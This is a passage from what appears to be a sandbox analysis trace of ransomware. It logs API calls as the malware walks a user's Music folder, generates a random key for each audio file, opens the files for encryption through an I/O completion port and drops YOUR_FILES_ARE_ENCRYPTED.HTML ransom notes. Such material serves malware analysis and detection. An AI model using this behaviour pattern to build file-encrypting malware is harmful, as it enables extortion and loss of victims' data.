(pszPath="RmJ3o4O8WNeKmj6Q.mp3") returned=".mp3" [0124.917] lstrlenW (lpString=".mp3") returned 4 [0124.917] PathFindExtensionW (pszPath="RmJ3o4O8WNeKmj6Q.mp3") returned=".mp3" [0124.917] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\wlcti1kot\\rmj3o4o8wnekmj6q.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.918] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=57580) returned 1 [0124.919] GetProcessHeap () returned 0x600000 [0124.919] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.919] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="65") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="A9") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="76") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="BD") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="97") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="28") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="AA") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="AB") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="FC") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="2E") returned 2 [0124.919] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="C9") returned 2 [0124.920] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="C0") returned 2 [0124.920] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="0B") returned 2 [0124.920] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="64") returned 2 [0124.920] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="BD") returned 2 [0124.920] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="AB") returned 2 [0124.920] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="AC") returned 2 [0124.920] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="5D") returned 2 [0124.920] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="B0") returned 2 [0124.920] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="AA") returned 2 [0124.920] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="31") returned 2 [0124.920] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="64") returned 2 [0124.920] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="A6") returned 2 [0124.920] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="14") returned 2 [0124.920] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="CA") returned 2 [0124.920] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="4E") returned 2 [0124.920] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="4E") returned 2 [0124.920] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="9C") returned 2 [0124.920] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="80") returned 2 [0124.920] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="DD") returned 2 [0124.920] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="A4") returned 2 [0124.920] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="42") returned 2 [0124.921] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\RmJ3o4O8WNeKmj6Q.mp3" [0124.921] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.921] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.921] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7d68d00, ftCreationTime.dwHighDateTime=0x1d7001a, ftLastAccessTime.dwLowDateTime=0xe8bff8c0, ftLastAccessTime.dwHighDateTime=0x1d706c8, ftLastWriteTime.dwLowDateTime=0xe8bff8c0, ftLastWriteTime.dwHighDateTime=0x1d706c8, nFileSizeHigh=0x0, nFileSizeLow=0xe0ec, dwReserved0=0x19e94c, dwReserved1=0x168845a, cFileName="RmJ3o4O8WNeKmj6Q.mp3", cAlternateFileName="RMJ3O4~1.MP3")) returned 0 [0124.921] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0124.921] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0124.921] GetProcessHeap () returned 0x600000 [0124.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wlctI1KoT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\wlcti1kot\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0124.922] WriteFile (in: hFile=0x32c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0124.923] CloseHandle (hObject=0x32c) returned 1 [0124.923] GetProcessHeap () returned 0x600000 [0124.923] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.923] GetProcessHeap () returned 0x600000 [0124.923] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0124.923] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62024240, ftCreationTime.dwHighDateTime=0x1d707b1, ftLastAccessTime.dwLowDateTime=0x94976d0, ftLastAccessTime.dwHighDateTime=0x1d70a06, ftLastWriteTime.dwLowDateTime=0x94976d0, ftLastWriteTime.dwHighDateTime=0x1d70a06, nFileSizeHigh=0x0, nFileSizeLow=0x60fc, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="wrP-HT0.wav", cAlternateFileName="")) returned 1 [0124.923] StrStrIW (lpFirst="wrP-HT0.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.923] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav") returned 63 [0124.923] PathFindExtensionW (pszPath="wrP-HT0.wav") returned=".wav" [0124.923] lstrlenW (lpString=".wav") returned 4 [0124.923] PathFindExtensionW (pszPath="wrP-HT0.wav") returned=".wav" [0124.924] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\wrp-ht0.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.925] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=24828) returned 1 [0124.925] GetProcessHeap () returned 0x600000 [0124.925] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.926] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="5C") returned 2 [0124.926] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="11") returned 2 [0124.926] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="06") returned 2 [0124.926] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="6C") returned 2 [0124.926] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="91") returned 2 [0124.926] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="5E") returned 2 [0124.926] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="B5") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="05") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="96") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="37") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="1E") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="D9") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D8") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="70") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E1") returned 2 [0124.926] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="FA") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="5C") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="70") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="7C") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="C2") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="73") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="98") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="E2") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="63") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="2A") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="95") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="0B") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C9") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="FF") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="E9") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="D5") returned 2 [0124.927] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="22") returned 2 [0124.927] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\wrP-HT0.wav" [0124.927] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.927] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.927] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62024240, ftCreationTime.dwHighDateTime=0x1d707b1, ftLastAccessTime.dwLowDateTime=0x94976d0, ftLastAccessTime.dwHighDateTime=0x1d70a06, ftLastWriteTime.dwLowDateTime=0x94976d0, ftLastWriteTime.dwHighDateTime=0x1d70a06, nFileSizeHigh=0x0, nFileSizeLow=0x60fc, dwReserved0=0x19ec60, dwReserved1=0xffd95b9f, cFileName="wrP-HT0.wav", cAlternateFileName="")) returned 0 [0124.928] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0124.928] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0124.928] GetProcessHeap () returned 0x600000 [0124.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pbc7nvlksqbotxewzv9\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0124.928] WriteFile (in: hFile=0x33c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0124.929] CloseHandle (hObject=0x33c) returned 1 [0124.929] GetProcessHeap () returned 0x600000 [0124.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.929] GetProcessHeap () returned 0x600000 [0124.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.929] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaee4100, ftCreationTime.dwHighDateTime=0x1d709c8, ftLastAccessTime.dwLowDateTime=0x8e792c40, ftLastAccessTime.dwHighDateTime=0x1d70a7b, ftLastWriteTime.dwLowDateTime=0x8e792c40, ftLastWriteTime.dwHighDateTime=0x1d70a7b, nFileSizeHigh=0x0, nFileSizeLow=0x4d4d, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="pu7woVnhqrGI.wav", cAlternateFileName="PU7WOV~1.WAV")) returned 1 [0124.929] StrStrIW (lpFirst="pu7woVnhqrGI.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.929] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav") returned 48 [0124.929] PathFindExtensionW (pszPath="pu7woVnhqrGI.wav") returned=".wav" [0124.930] lstrlenW (lpString=".wav") returned 4 [0124.930] PathFindExtensionW (pszPath="pu7woVnhqrGI.wav") returned=".wav" [0124.930] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pu7wovnhqrgi.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.930] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=19789) returned 1 [0124.930] GetProcessHeap () returned 0x600000 [0124.930] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0124.932] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A0") returned 2 [0124.932] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="02") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="DF") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="7C") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="1C") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="45") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="A7") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="04") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="A5") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="7E") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="0D") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="9C") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="34") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="12") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="F5") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D3") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="E3") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="B6") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="81") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="8D") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="58") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="F5") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="96") returned 2 [0124.932] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="9E") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="B3") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="AA") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="28") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="43") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="CE") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="CF") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="B1") returned 2 [0124.933] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5C") returned 2 [0124.933] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\pu7woVnhqrGI.wav" [0124.933] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.933] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0124.933] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1a91240, ftCreationTime.dwHighDateTime=0x1d70134, ftLastAccessTime.dwLowDateTime=0x6ea85c10, ftLastAccessTime.dwHighDateTime=0x1d7061b, ftLastWriteTime.dwLowDateTime=0x6ea85c10, ftLastWriteTime.dwHighDateTime=0x1d7061b, nFileSizeHigh=0x0, nFileSizeLow=0x9ab8, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="R2nOG7Kqkcj.wav", cAlternateFileName="R2NOG7~1.WAV")) returned 1 [0124.933] StrStrIW (lpFirst="R2nOG7Kqkcj.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.933] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav") returned 47 [0124.933] PathFindExtensionW (pszPath="R2nOG7Kqkcj.wav") returned=".wav" [0124.933] lstrlenW (lpString=".wav") returned 4 [0124.933] PathFindExtensionW (pszPath="R2nOG7Kqkcj.wav") returned=".wav" [0124.934] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\r2nog7kqkcj.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.934] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=39608) returned 1 [0124.934] GetProcessHeap () returned 0x600000 [0124.934] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0124.936] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="83") returned 2 [0124.936] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="82") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="20") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="C1") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="6E") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="DB") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="EF") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="FE") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="CE") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="3A") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="35") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="9F") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="86") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="74") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="01") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="2B") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="1F") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="D6") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="6A") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="53") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="43") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="D8") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="07") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="51") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="C0") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="1F") returned 2 [0124.944] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="9F") returned 2 [0124.945] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="C2") returned 2 [0124.945] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="B2") returned 2 [0124.945] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="40") returned 2 [0124.945] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="76") returned 2 [0124.945] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="48") returned 2 [0124.945] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\R2nOG7Kqkcj.wav" [0124.945] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.945] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0124.945] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42d5aa70, ftCreationTime.dwHighDateTime=0x1d6fa13, ftLastAccessTime.dwLowDateTime=0x9a342480, ftLastAccessTime.dwHighDateTime=0x1d6ffaa, ftLastWriteTime.dwLowDateTime=0x9a342480, ftLastWriteTime.dwHighDateTime=0x1d6ffaa, nFileSizeHigh=0x0, nFileSizeLow=0x155b2, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="vaHBhl.mp3", cAlternateFileName="")) returned 1 [0124.945] StrStrIW (lpFirst="vaHBhl.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.945] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3") returned 42 [0124.945] PathFindExtensionW (pszPath="vaHBhl.mp3") returned=".mp3" [0124.945] lstrlenW (lpString=".mp3") returned 4 [0124.945] PathFindExtensionW (pszPath="vaHBhl.mp3") returned=".mp3" [0124.945] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\vahbhl.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.946] 